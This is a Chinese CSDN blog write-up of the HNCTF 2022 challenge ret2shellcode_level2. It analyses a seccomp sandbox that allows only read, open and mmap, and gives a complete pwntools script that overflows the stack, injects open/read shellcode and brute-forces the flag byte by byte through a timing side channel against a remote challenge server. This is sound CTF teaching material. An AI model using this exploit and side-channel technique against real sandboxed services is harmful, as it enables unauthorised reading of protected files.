PWN-沙箱绕过-侧信道爆破攻击-[HNCTF 2022 WEEK3]ret2shellcode_level2

最新推荐文章于 2025-06-06 17:39:26 发布
最新推荐文章于 2025-06-06 17:39:26 发布
阅读量460 收藏 3
点赞数 12
分类专栏: PWN67 文章标签: PWN CTF 安全 栈溢出 ret2shellcode 沙箱 侧信道爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/148456006
版权

先看一下主函数

s 数组存在溢出

并且读入 s 的内容会被 cp 到 buff

mprotect((void *)((unsigned __int64)&stdout & 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7);

 对包含标准输出结构体 stdout 的内存页,设置它的权限为可读、可写、可执行

buff 所在地址可读可写可执行 

正常这道题直接打 ret2shellcode 

但是这里存在沙箱

代码详细分析:

v1 = seccomp_init(0LL);

初始化一个 seccomp 过滤器上下文

seccomp_init(0LL) 等价于 seccomp_init(SCMP_ACT_KILL)

默认行为是:阻止(杀死)所有系统调用

seccomp_rule_add(v1, 2147418112LL, 9LL, 0LL);  // mmap
seccomp_rule_add(v1, 2147418112LL, 0LL, 0LL);  // read
seccomp_rule_add(v1, 2147418112LL, 2LL, 0LL);  // open

2147418112LL == 0x7fff0000 == SCMP_ACT_ALLOW,表示 允许这些调用 

syscall名称功能
0read读数据
2open打开文件
9mmap映射内存
seccomp_load(v1);

加载规则 → 正式启用沙箱过滤 

那么我们这里就无法系统调用 execve

如果直接打 ret2shellcode 会触发 `SIGSYS`(signal 31),表示:

非法的系统调用被执行,因为系统调用被拦截、限制

那么我们就需要采用其他方法,比如侧信道攻击

看了一下这里确实只允许 `read`、`open`、`mmap`

侧信道攻击(Side Channel Attack)并不依赖正常程序逻辑的漏洞,而是通过观察程序的行为差异(如时间、电量、声音)间接获取敏感信息

在 Pwn 方向中,最常用的是:

  • 时间侧信道:观察执行时间的长短判断是否进入某个死循环,从而验证猜测是否正确。

  • 非预期反馈路径:程序通过死循环、崩溃与否、是否回显等行为间接泄露内部状态。

类似于 Web 里面的 SQL 盲注 

整体利用思路:

构造 shellcode,注入程序中并使其可执行;

调用 open 打开 flag 文件,获取文件描述符;

使用 read 将 flag 内容读入一段可读写的内存区域(如 stack, .bss, 或 mmap);

构造一段 用于逐字节比较 flag 的 shellcode,实现爆破。

编写 exp:

# @author:My6n
# @time:20250605
from pwn import *
import time
import string

context(os='linux', arch='amd64', log_level='debug')

dic = list(string.printable.encode())

flag = ''
idx = 0
#idx = len(flag)

read_addr = 0x404000
buff_addr = 0x404060

shellcode_template = """
mov rdx, rsi
cmp byte ptr [rdx + {offset}], {char}
jz $-0x4
mov al, 59
syscall
"""

while True:
    for guess in dic:
        io = remote('node5.anna.nssctf.cn', 21887)

        compare_code = shellcode_template.format(offset=idx, char=guess)
        payload = asm(
            shellcraft.open('flag') +
            shellcraft.read(3, read_addr, 0x30) +
            compare_code
        )

        payload = payload.ljust(264, b'a') + p64(buff_addr)

        io.send(payload)

        start = time.time()
        io.can_recv(timeout=2)
        end = time.time()

        io.close()

        print(f"Trying idx={idx} char={chr(guess)} | Current flag: {flag}")

        if end - start > 2:
            flag += chr(guess)
            print(f"[+] Found char at idx {idx}: {chr(guess)}")
            break

    if flag.endswith('}'):
        break

    idx += 1

print(f"[+] Final flag: {flag}")

拿到 flag:

nssctf{S1d3_ch@nn3l_bl@st1ng_t0_g3t_fl4g}

pwn】记一道shellcode侧信道攻击
woodwhale的博客
10-16 5067
pwn】记一道shellcode侧信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是侧信道攻击
PWN · ret2shellcode | sandbox-bypass | 格式化字符串】[2024CISCN · 华东北赛区]pwn1_
Mr_Fmnwon的博客
07-06 912
ret2shellcode,已经不是简单的放到栈上、ret这样一个简单的过程。套一层seccomp的沙箱,打ORW又遇到open受限等等,考虑的蛮多。过程中收获最多的可以说是汇编shellcode手动编写时的一些心得,还是跟着返璞归真师傅的wp做的时候这不会那不会,做完之后写博客,感觉很多都没必要写。。。菜就多练。
CTF-PWN-ret2shellcode全解
2301_79326514的博客
09-21 2364
可见字符的shellcode是在什么时候用到的呢,有些程序会对用户输入进行检测,让用户只能输入可见字符的时候,就可以用到这个攻击方法了,原理还是很简单的,利用汇编指令对应的ascll码写出来,所以如果要手写的话是要懂汇编的,如果有需要可以自行学习一下。如果我们要写的时候可以写。可以看到运行过这个函数以后,buf所在的0x4040A0也就变成了可读可写可执行了,所以我们把shellcode写入到buff中就可以进行执行了关于mprotect函数的具体使用我在前面一个文章中已经讲解的很详细了,大家可以去看看。
2024 0xGame Week2-PWN-Writeup
dingxingaq的博客
10-24 930
直接溢出使用libc,但是必须要用题目给的libc文件才可以循环和随机数都没啥用,直接不执行去,滑到shellcode就可以了read读入0x100个字节,然后一个循环,没啥用,还有一个沙箱,使用工具查看沙箱沙箱禁止了,那么就利用一些别的shellcode,不能够用生成的了这个shellcode是进行直接读flagez_format格式化字符串漏洞,保护全开主要思路是先泄露main函数的地址也可以泄露其他函数的地址,比如_start函数,通过main。
2022强网拟态pwn-only
z1r0的博客
11-23 484
所以攻击思路大致是这样的,任意地址申请到tcache管理这里,打出290的key为7,这样再释放之后290这里会进入unsortedbin中,打刚刚释放的这个地方到stdout那里去泄露出libc。这里需要爆破,泄露出libc之后继续利用unsortedbin的分割来打hook到tcache里,接着申请出来,打hook为magic_gadget。这里的magic_gadget就是2.31下的orw的magic_gadget。这里需要注意的是seccomp上的沙箱,所以堆上会有残留的bins。
强网杯-PWN-baby_heap
2301_79696060的博客
11-04 1068
强网杯-PWN-baby_heap
2023 安洵杯-PWN-【seccomp】
llovewuzhengzi的博客
01-16 1065
rt_sigreturn系统调用函数会更新所有寄存器的值,没有设置的将默认为0,所以此时将必要的寄存器都有设置一遍,不存在什么顺序执行得到更新的。关闭文件1后,fd=3被释放出来,所以再创建文件3时,fd3被分配的是当前最小描述符,即刚刚被释放的fd1,所以fd=3。第一个参数path表示:路径名或者文件名。构造第二次read的sigreturnfram,读取flag对应的文件的内容到某个可写的内存位置中。构造第一次open的sigreturnfram,打开flag对应的文件,此时对应的文件描述符是3
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
azraelxuemo的博客
03-09 6931
What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到syscall,可以考虑利用这种攻击手法 而且现在有些题目出现沙盒,seccomp机制会ban掉一些函数,然后一般会允许使用open,read,write,就可以用读文件方法获取flag pwn题思路 一般如果看到沙盒或者出现syscall可以考虑使用这种攻击手法 例题 [极客大挑战 2019]Not Bad 保护机制 看上去没有任何保护,栈可写可执行 进入之后发现有这么一
pwn学习笔记(8)--初识Pwn沙箱
qq_66013948的博客
08-06 1449
沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。​ 安全计算模式seccomp(Secure Computing Mode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和黑名单。seccomp机制用于限制应用程序可以使用的系统调用,增加系统的安全性。​ 在ctf中主要通过两种方
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
ROP是一种绕过NX Bit的技术,它不直接跳转到恶意代码,而是利用已存在于程序内存空间中的小片段(称为gadgets)构造一个逻辑链,每个gadget都以`ret`指令结尾,通过控制栈上的返回地址,使得程序顺序执行这些gadgets...
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1656
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
2021 蓝帽杯 pwn slient
weixin_51298357的博客
04-29 1071
2021 蓝帽杯 pwn slient 这道题不是第一个上的pwn题,第一道太难了,第二个一出来就去看第二个题了= = 一个沙箱绕过的题,以前没写过类似的,当场也没有写出来,于是复现一下。 前置知识 seccomp概述 restrict模式:SECCOMP_SET_MODE_STRICT 白名单:read,write,_exit,sigreturn 除了已经打开的文件描述符和允许的系统调用,如果发起其他系统调用,内核会使用SIGKILL或SIGSYS终止进程 filter模式:SECCOMP
加密货币钱包开发指南:多链资产管理与非托管安全范式
Lovely_xwys的博客
06-06 889
后端:Rust(高性能核心模块) + Go(跨链通信层);前端:React Native(跨平台兼容) + Web3.js(区块链交互);区块链适配:以太坊Solidity、Solana Anchor框架。
安全】VulnHub靶场 - W1R3S
风舞雪凌月的博客
06-02 668
本文记录了对W1R3S.inc服务器的渗透测试过程。通过扫描发现靶机开放21(FTP)、22(SSH)、80(HTTP)、3306(MySQL)端口,其中FTP存在匿名登录漏洞,获取到包含潜在密码线索的文档。Web服务发现Apache默认页面及Cuppa CMS安装界面,同时存在WordPress目录但访问受限。测试人员尝试了SSH和MySQL的弱口令爆破未果,后续将重点利用FTP获取的信息和Web应用漏洞进行深入渗透,最终目标是获取root权限并找到/root目录下的flag。测试过程展示了从信息收集到漏
当 “欧洲版 Cursor” 遇上安全危机
2401_86652632的博客
06-03 579
今年 320 日,Palmer 发现 Lovable 创建的 Linkable 网站存在漏洞,只需修改查询参数,就能获取项目 “用户” 表中的所有数据,他甚至因此看到了约 500 名该应用用户的电子邮件地址。漏洞报告显示,这项安全扫描仅仅是确定 Supabase 数据库是否启用访问控制,而对于控制选项是否正确配置这一关键问题,却选择了回避,导致网站依然面临数据操纵和注入等严重安全问题,充分暴露出 Lovable 生态系统中系统性的 RLS 实施缺陷。在追求便捷开发的同时,安全绝不能被忽视。
本地部署企业邮箱,让企业办公更安全高效
U-Mail邮件服务器软件
06-06 180
基于安全性、个性化需求、系统集成等方面的考量,越来越多的企业倾向于选择本地部署企业邮箱,本地化部署不仅能够有效守护企业信息安全,还能依据企业未来发展的需求,灵活调整企业邮箱系统的功能,甚至进行二次开发,同时实现与其他办公系统的无缝集成,为企业数字化办公提供坚实支撑。企业邮箱系统运行在稳定的环境中,访问速度更快,系统运行更可靠,能够有效避免因网络问题导致的邮件服务中断。本地部署的企业邮箱可以与企业现有的OA系统、CRM、ERP等办公系统无缝对接,形成统一的数字化办公平台。
第二章 2.3 数据存储安全风险之数据存储风险防范
weixin_43172311的博客
06-04 1089
大家好,今天我想和大家聊聊一个既专业又与我们生活息息相关的话题——数据安全风险防控。无论你是普通用户还是技术从业者,了解这些内容都能帮助你在数字世界中更好地保护自己和他人。
装载机防撞系统:智能守护,筑牢作业现场人员安全防线
最新发布
wtsafe的博客
06-06 288
《装载机智能防撞系统重塑工地安全生态》摘要:传统建筑工地中,装载机作业面临视野盲区、复杂地形和粉尘干扰等多重安全隐患。唯创安全推出的智能防撞系统通过AI和UWB技术实现精准防护:AI系统主动探测周边移动目标并动态预警,UWB系统通过测距标签实现三级区域精确防护(精度达10厘米),结合自动限速和停车功能,从根本上杜绝碰撞事故。这种从被动防护到智能预警的转变,显著提升了工地安全水平,推动传统工地向"智慧安全工地"转型。(149字)
【Java后端基础 005】ThreadLocal-线程数据共享和安全
金哥的博客
06-06 510
ThreadLocal常用方法,经典应用场景,以及解析
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值